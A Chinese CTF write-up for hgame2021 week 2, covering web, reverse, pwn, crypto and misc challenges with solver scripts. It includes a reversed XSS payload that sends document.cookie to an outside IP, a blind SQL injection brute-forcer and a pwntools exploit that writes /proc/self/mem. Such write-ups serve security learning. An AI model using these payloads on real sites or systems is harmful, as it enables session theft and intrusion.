[原创] 杭电hgame2021 week2 writeup
2021-5-27 14:06
8880
[原创] 杭电hgame2021 week2 writeup
杭电hgame2021 week2
web LazyDogR4Uwww.zip可获得源码,分析一下php就行
1
submit
=
getflag&_SESSESSIONSION[username]
=
admin
Post to zuckonitxss,写个爆破md5的脚本,在服务器搭个接收cookie的环境
xss的payload
1
>;eikooc.tnemucod
+
'=eikooc?php.xedni/271.621.232.94//'
=
onitacol.tnemucod
=
rorreno x
=
crs gmi<
200OK!!sql盲注,根据status字段来回显,采取一个一个字符爆破的方式,select from where需要大小写绕过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import
requests
import
string
import
re
s
=
requests.session()
url
=
'https://200ok.liki.link/server.php'
ans
=
''
dict
=
string.ascii_letters
+
string.digits
+
string.punctuation
for
i
in
range
(
1
,
60
):
print
(i)
for
j
in
dict
:
hd
=
{
'Status'
: payload
}
ra
=
s.get(url
=
url,headers
=
hd).text
if
'HTTP 200 OK'
in
ra:
print
(j)
ans
+
=
j
print
(ans)
break
liki的生日礼物条件竞争,抓个买一台的包,然后多线程重复发包就行
RE ezAPK一个标准的AESCBC加密,密文和密钥在解压缩出来的strings文档里,密钥的md5作为IV,然后找个在线网站解即可
helloRe2第一个password比较简单,把比较的字符串提取出来就行
第二个password有个创建子进程的操作,这时候我们可以先启动程序,输入第一个password,然后在等待password2输入的时候attach上去,即可绕过
然后password2就是调用了windowsAPI的一个AESCBC加密,调试拿到密钥和IV,在线网站就可以解
fake_debugger betanc连上去,根据回显,就是个异或,一个一个字符弄出flag就行
pwn1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from
pwn
import
*
context.arch
=
"amd64"
context.log_level
=
'debug'
sh
=
remote(
'159.75.104.107'
,
30398
)
sh.recvuntil(
'>> '
)
sh.sendline(
'2'
)
sh.recvuntil(
'>> '
)
sh.sendline(
'1'
)
sh.recvuntil(
'>>'
)
payload
=
'/proc/self/maps'
sh.sendline(payload)
r
=
sh.recvuntil(
">> "
).splitlines()
print
(r)
find
=
''
for
i
in
r:
if
b
'shop'
in
i
and
b
'r--p'
in
i:
find
=
i
break
print
(find)
elfbase
=
int
(find[
25
:
37
],
16
)
print
(
hex
(elfbase))
sh.sendline(
'3'
)
sh.recvuntil(
'>> '
)
sh.sendline(
'111111111111111111111111111'
)
sh.recvuntil(
'>> '
)
sh.sendline(
'3'
)
sh.recvuntil(
'>> '
)
sh.sendline(
'1'
)
sh.recvuntil(
'>> '
)
sh.sendline(
'/proc/self/mem'
)
sh.recv()
sh.send(
str
(elfbase
+
8963
))
sh.recv()
sh.interactive()
the_shop_of_cosmos涉及到proc/self/maps和proc/self/mem的知识,首先maps可以输出当前文件加载的基地址,然后mem可以根据基地址来修改内存
还有就是输入购买数量的时候有个漏洞,当你输入的数字足够大,那么不仅不减钱,还会给你加钱
exp就不贴了,较简单
Crypto signin涉及到逆元的知识,还有费马小定理
1
2
3
4
5
6
7
8
9
10
11
from
gmpy2
import
*
import
gmpy2 as gp
import
libnum
a
=
120564833131633739158549093373383030645182202806635769940195284023469961424430923715818093121085879348486463281230726872340657095109768577902440918006603617292966510139101925420092009141992297880055417691248727683982726247023493718983115997089469688231746849686247739418658852264067119018204494137801699628029
p
=
148140300958875725110463571601905200234821194378794516477263427461757925343914688226737140798026085300393433907134398619032741580554160606218907137988428324426186509706800792611343514541678289427961521540035354172625978137607303224840667034663267838925533542620638127405243015959966081896809444573527022309249
c
=
68440055982359010847898371404412732634348351726170164279294474616113724074780415334776297201043620092127606983656166275101316284528506702011968422243891906577121609117923786504777856703297008749336097935284178407297998562145215797433785929150838433234255425306556109520390062565249629009857440054617892617632
ina
=
gp.invert(a,p)
m
=
c
*
ina
%
p
print
(bytes.fromhex(
hex
(m)[
2
:]))
gcd or more?基本RSA
WhitegiveRSA白给RSA
The Password这题相当于解六十四元异或方程组,可以用矩阵的知识解,这里我用的z3解
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from
z3
import
*
solver
=
Solver()
flag
=
[BitVec(
'flag%d'
%
i,
8
)
for
i
in
range
(
64
)]
rflag
=
[
0
for
i
in
range
(
64
)]
lflag
=
[
0
for
i
in
range
(
64
)]
for
i
in
range
(
64
):
if
(i<
56
):
rflag[i]
=
flag[i
+
8
]
else
:
rflag[i]
=
flag[i
-
56
]
for
i
in
range
(
64
):
if
(i<
48
):
lflag[i]
=
flag[
16
+
i]
else
:
lflag[i]
=
flag[i
-
48
]
value
=
8020289479524135048
^
4092084344173014
value
=
'{:064b}'
.
format
(value)
for
i
in
range
(
64
):
solver.add(flag[i] ^ rflag[i] ^ lflag[i]
=
=
int
(value[
63
-
i],
2
))
if
solver.check()
=
=
sat:
model
=
solver.model()
for
i
in
range
(
64
):
print
(model[flag[i]].as_long().real,end
=
'')
else
:
print
(
"unsat"
)
因为我这里把最右边当作第一位,所以输出的数据要倒序,最后转成十六进制,每两位就是一个字符,把七组数据代进脚本,解出后拼在一起就是flag
misc Tools这题就是教了各种隐写工具,根据压缩包的名字就可以找到对应的工具,解套娃就行
Telegraph:1601 6639 3459 3134 0892音频隐写
中间有一段摩斯电码,长波为_,短波为.
解出来就是flag
Hallucigenia用StegSolve可以得到一张二维码,扫描后是一串base64,先解码,再逆序,再转图片,最后翻转图片就可以得到flag
DNS流量分析
wireshark打开,可以看到flag.hgame2021.cf这个网站,试着访问,F12可以看到提示SPF
1
nslookup
-
type
=
txt flag.hgame2021.cf
即可得到flag
【看雪培训】《Adroid高级研修班》2022年夏季班招生中!
最后于 2021-6-15 20:00
被77pray编辑
,原因:
上传的附件: